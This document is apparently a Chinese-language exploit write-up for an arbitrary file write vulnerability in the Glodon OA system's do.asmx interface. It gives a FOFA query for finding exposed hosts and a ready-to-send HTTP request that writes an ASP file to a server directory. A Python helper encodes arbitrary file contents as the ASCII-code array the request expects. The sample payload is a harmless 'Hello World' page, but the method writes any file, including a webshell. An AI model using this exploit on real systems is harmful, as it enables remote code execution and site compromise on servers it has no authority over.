广联达OA系统接口do.asmx存在任意文件写入漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"POST /m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=WriteAllBytes HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Connection: close
["\"D:\\\\Program Files (x86)\\\\Glodon\\\\GTP\\\\data\\\\gtp-default\\\\FileStorage\\\\UserFiles\\\\1.asp\"","[60, 37, 32, 82, 101, 115, 112, 111, 110, 115, 101, 46, 87, 114, 105, 116, 101, 40, 34, 72, 101, 108, 108, 111, 44, 32, 87, 111, 114, 108, 100, 34, 41, 32, 37, 62]","false"]请求体中的上传路径并不通用,需要根据实际环境选择,文件的内容需要转换为ASCII码
def ascii_to_char(ascii_codes):
"""将ASCII码列表转换为字符"""
return ''.join(chr(code) for code in ascii_codes)
def char_to_ascii(char):
"""将字符串转换为ASCII码列表"""
return [ord(c) for c in char]
def main():
print("0 字符转ASCII码")
print("1 ASCII码转字符")
choice = input("请选择转换类型(0/1): ")
if choice == '0':
# 字符转ASCII码
chars = input("请输入要转换的字符: ")
ascii_codes = char_to_ascii(chars)
print("字符转ASCII码:", ascii_codes)
elif choice == '1':
# ASCII码转字符
ascii_codes_str = input("请输入以逗号分隔的ASCII码(例如:65,66,67): ")
ascii_codes = [int(code.strip()) for code in ascii_codes_str.split(',')]
converted_chars = ascii_to_char(ascii_codes)
print("ASCII码转字符:", converted_chars)
else:
print("无效的输入,请输入0或1。")
if __name__ == "__main__":
main()
